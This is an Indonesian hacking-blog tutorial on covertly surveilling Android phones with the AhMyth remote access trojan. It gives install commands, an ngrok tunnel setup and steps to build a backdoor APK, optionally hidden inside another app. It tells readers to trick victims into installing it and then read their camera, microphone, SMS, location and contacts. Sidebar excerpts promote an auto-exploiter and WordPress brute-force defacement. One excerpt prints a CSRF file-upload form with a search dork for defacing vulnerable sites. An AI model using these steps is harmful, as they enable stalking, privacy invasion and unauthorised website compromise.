Skip to main content

[ RAT ] Menyadap Android Dengan AhMyth

Image
By
squadcyber.net - Hay guys, kali ini gw akan membawakan cara menyadap ( Rat ) android lagi dengan AhMyth, sebelum nya gw juga sudah pernah membahas cara menyadap android dengan Metasploit, namun menurut gw Ahmyth lebih mudah dan lebih mantab karena di jalankan dengan GUI ( Graphical User Interface, dan enak nya lagi Ahmyth bisa di gunakan di Linux dan Windows.


Cara Install AhMyth

Linux

Download terlebih dahulu Binary nya : Linux32bit, Linux64bit.
lalu buka terminal, dan ketikkan seperti di bawah ini.

Linux32bit : dpkg -i AhMyth_linux32.deb
Linux64bit : dpkg -i AhMyth_linux64.deb

Windows

Download Binary nya lalu install secara manual : Win32bit, Win64bit.

Membuat Backdoor APK

Pastikan kalian sudah mempunyai & mengkonfigurasi ngrok dan jalan kan ngrok nya.

root@v3rluchie:~# ./ngrok tcp 4545


Jika kalian menggunakan Windows maka langsung buka AhMyth.exe nya, jika kalian menggunakan Linux buka terminal dan ketik.

root@v3rluchie:~# ahmyth

Setelah AhMyth nya terbuka, pindah ke tab Apk Builder, dan isikan ip dan port nya dengan ip dan port ngrok.
ip: 0.tcp.ngrok.io port:17474
centang Build With Another Apk jika kalian ingin menyisipkannya ke dalam aplikasi lain, lalu klik Build.




Apk backdoor AhMyth akan tersimpan di /root/AhMyth/Output/Ahmyth.s.apk

Setelah backdoor nya telah terbuat, kalian lakukan social engineering ke korban agar korban menginstall backdoor tersebut di hp korban.

Jika sudah terinstall di hp korban, kita buka tab victims, dan masukkan port 4545 tadi, lalu klik listen.


Maka akan muncul device korban yang telah terinstall backdoor AhMyth tadi, untuk mengakses device korban, klik Open The Lab pada list device yang sudah terhubung dengan kita.

Di sini kita bisa akses Camera, Folder, Mic, Location, Contact, Sms, Call.
Camera
File manager
Mic
Location
Contact
Sms
Call
Demikian tutorial Menyadap Android Dengan AhMyth.
Semoga bermanfaat.
Labels:

Comments

  1. Unknown20 March 2018 at 05:08

    Can we do with termux???

    ReplyDelete
  2. Unknown24 April 2018 at 00:25

    gan, cara konfigurasi ngrok nya gimana ya?
    makasih

    ReplyDelete
    Replies
    1. V3rluchie24 April 2018 at 23:02

      konfigurasi ngrok nya bisa masuk dulu ke ngrok.com nanti daftar akun trus nanti bakalan di kasih authtikennya dan cara aktifkan nya gan

      Delete
  3. Unknown24 April 2018 at 01:14

    building failed trs gan?

    ReplyDelete
  4. Unknown6 August 2018 at 10:27

    Port nya cuman untuk sekali pakai ya gan?
    Soalnya setelah keesokan hari nya listen pakai port yg kemaren udah gak mau

    ReplyDelete
  5. RuangMusik12 October 2018 at 06:54

    Gan failed terus kenapa ya
    Saya paket linux

    ReplyDelete
  6. Unknown13 February 2019 at 04:11

    Iya saya juga port failed

    ReplyDelete

Post a Comment

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

By
squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...
5 comments
Read more

Deface Wordpress Bruteforce dengan WPScan

By
squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...
Post a Comment
Read more

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

By
www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...
Post a Comment
Read more